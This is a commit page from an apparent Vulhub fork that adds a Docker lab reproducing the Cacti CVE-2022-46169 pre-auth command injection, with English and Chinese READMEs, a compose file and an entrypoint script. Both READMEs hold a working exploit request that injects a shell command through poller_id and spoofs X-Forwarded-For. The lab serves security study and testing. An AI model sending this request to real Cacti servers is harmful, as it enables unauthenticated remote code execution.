aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
cacti/CVE-2022-46169/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 213 KiB

BIN
cacti/CVE-2022-46169/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 49 KiB

BIN
cacti/CVE-2022-46169/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
cacti/CVE-2022-46169/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 77 KiB

BIN
cacti/CVE-2022-46169/5.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 23 KiB

56
cacti/CVE-2022-46169/README.md Normal file
View File

@@ -0,0 +1,56 @@
# Cacti remote_agent.php Pre-Auth Command Injection (CVE-2022-46169)
[中文版本(Chinese version)](README.zh-cn.md)
Cacti is a robust and extensible operational monitoring and fault management framework for users around the world. A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti prior from version 1.2.17 to 1.2.22, if a specific data source was selected for any monitored device.
References:
- <https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf>
- <https://mp.weixin.qq.com/s/6crwl8ggMkiHdeTtTApv3A>
## Vulnerability Environment
Execute following command to start a Cacti server 1.2.22:
```
docker compose up -d
```
After the server is started, you will see the login page at `http://localhost:8080`.
Then login as admin/admin, follow the instructions to initialize the application. Actually, just click the "next button" again and again before you see the success page.
![](1.png)
Before you can exploit this vulnerability, you have to add a new "Graph" because the command injection is occurred not in the default graph type:
![](2.png)
Select the graph type "Device - Uptime", and click the "Create" button:
![](3.png)
## Exploit
After complete the above initialization, you will change your role to a attacker. Just send following request to Cacti server to trigger the command injection attack:
```
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![](4.png)
Although no command result in the response, you can find the `/tmp/success` has been touched successfully.
![](5.png)

54
cacti/CVE-2022-46169/README.zh-cn.md Normal file
View File

@@ -0,0 +1,54 @@
# Cacti remote_agent.php 前台命令注入漏洞CVE-2022-46169
Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。
参考链接:
- <https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf>
- <https://mp.weixin.qq.com/s/6crwl8ggMkiHdeTtTApv3A>
## 漏洞环境
执行如下命令启动一个Cacti 1.2.22版本服务器:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`会跳转到登录页面。使用admin/admin作为账号密码登录并根据页面中的提示进行初始化。
实际上初始化的过程就是不断点击“下一步”,直到安装成功:
![](1.png)
这个漏洞的利用需要Cacti应用中至少存在一个类似是`POLLER_ACTION_SCRIPT_PHP`的采集器。所以我们在Cacti后台首页创建一个新的Graph
![](2.png)
选择的Graph Type是“Device - Uptime”点击创建
![](3.png)
## 漏洞利用
完成上述初始化后,我们切换到攻击者的角色。作为攻击者,发送如下数据包:
```
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![](4.png)
虽然响应包里没有回显,但是进入容器中即可发现`/tmp/success`已成功被创建:
![](5.png)

19
cacti/CVE-2022-46169/docker-compose.yml Normal file
View File

@@ -0,0 +1,19 @@
version: '2'
services:
web:
image: vulhub/cacti:1.2.22
ports:
- "8080:80"
depends_on:
- db
entrypoint:
- bash
- /entrypoint.sh
volumes:
- ./entrypoint.sh:/entrypoint.sh
command: apache2-foreground
db:
image: mysql:5.7
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=cacti

17
cacti/CVE-2022-46169/entrypoint.sh Normal file
View File

@@ -0,0 +1,17 @@
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"